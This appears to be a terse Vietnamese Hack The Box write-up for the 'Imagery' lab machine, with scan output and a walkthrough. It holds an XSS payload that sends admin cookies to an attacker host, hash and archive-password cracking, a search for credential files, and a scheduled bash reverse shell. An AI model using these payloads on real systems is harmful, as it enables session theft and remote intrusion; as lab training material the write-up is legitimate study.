Imagery - path traverse
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/htb/machines/Imagery/reports/_10.10.11.88_8000/_25-10-07_12-41-40.txt
Target: http://10.10.11.88:8000/
[12:41:41] Starting:
[12:42:23] 401 - 59B - /images
[12:42:30] 405 - 153B - /login
[12:42:31] 405 - 153B - /logout
[12:42:41] 405 - 153B - /register
[12:42:48] 401 - 32B - /uploads/affwp-debug.log
[12:42:48] 401 - 32B - /uploads/dump.sql
Task Completed
```
Sau khi thử nghiệm input một số payload độc hại, kết quả là phần input ở trang này bị dính lỗ hổng XSS, có thể lấy được cookie của admin thông qua payload này.
<img src=x onerror="document.location='http://<ATTACK_MACHINE_IP>:<PORT>/?cookie='+document.cookie">
Trước khi inject thì bật netcat để lấy được thông tin request.
nc -lnvp 80
```json
{
"users": [
{
"username": "admin@imagery.htb",
"password": "5d9c1d507a3f76af1e5c97a3ad1eaa31",
"isAdmin": true,
"displayId": "a1b2c3d4",
"login_attempts": 0,
"isTestuser": false,
"failed_login_attempts": 0,
"locked_until": null
},
{
"username": "testuser@imagery.htb",
"password": "2c65c8d7bfbca32a3ed42596192384f6",
"isAdmin": false,
"displayId": "e5f6g7h8",
"login_attempts": 0,
"isTestuser": true,
"failed_login_attempts": 0,
"locked_until": null
}
],
"images": [],
"image_collections": [
{
"name": "My Images"
},
{
"name": "Unsorted"
},
{
"name": "Converted"
},
{
"name": "Transformed"
}
],
"bug_reports": []
}
crack hash
lika@learning:~/Downloads/CVE-2024-8353$ nano token.txt
lika@learning:~/Downloads/CVE-2024-8353$ hashcat -a 0 -m 0 "2c65c8d7bfbca32a3ed42596192384f6" /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 1810/3685 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
pass là iambatman
Login, RCE vao image crop, vào được linux Tìm được pass Sau đó tìm các file find / ( -iname "*id_rsa" -o -iname "*db" -o -iname "*sql" -o -iname "*key" -o -iname "*pem" -o -iname "*backup" -o -iname "*bak" -o -iname "*conf" ) 2>/dev/null
import pyAesCrypt
import sys
def decrypt(encrypted_file, password):
try:
pyAesCrypt.decryptFile(
encrypted_file,
"web_20250806_120723.zip",
password,
256 * 1024
)
return True
except:
return False
# Đọc wordlist
with open('/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt', 'r', encoding='latin-1') as f:
for line in f:
password = line.strip()
print(f"Trying: {password}", end='\r')
if decrypt('web_20250806_120723.zip.aes', password):
print(f"\n[+] Password found: {password}")
sys.exit(0)
print("\n[-] Password not found")
bash-5.2$ find / \( -iname "*id_rsa" -o -iname "*db" -o -iname "*sql" -o -iname "*key" -o -iname "*pem" -o -iname "*backup" -o -iname "*bak" -o -iname "*conf" \) 2>/dev/null
<" -o -iname "*bak" -o -iname "*conf" \) 2>/dev/null
/var/backup
/var/cache/debconf
/var/cache/man/ro/index.db
/var/cache/man/sr/index.db
/var/cache/man/fr/index.db
...............
Giải nén pyAesCrypt -d web_20250806_120723.zip.aes -o web_20250806_120723.zip -p 'be******ds'
Crack pass
01c3d2e5bdaf6134cec0a367cf53e535:supersmash
sudo /usr/local/bin/charcol shell
auto add --schedule "* * * * *" --command "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.14/4444 0>&1'" --name "RevShell"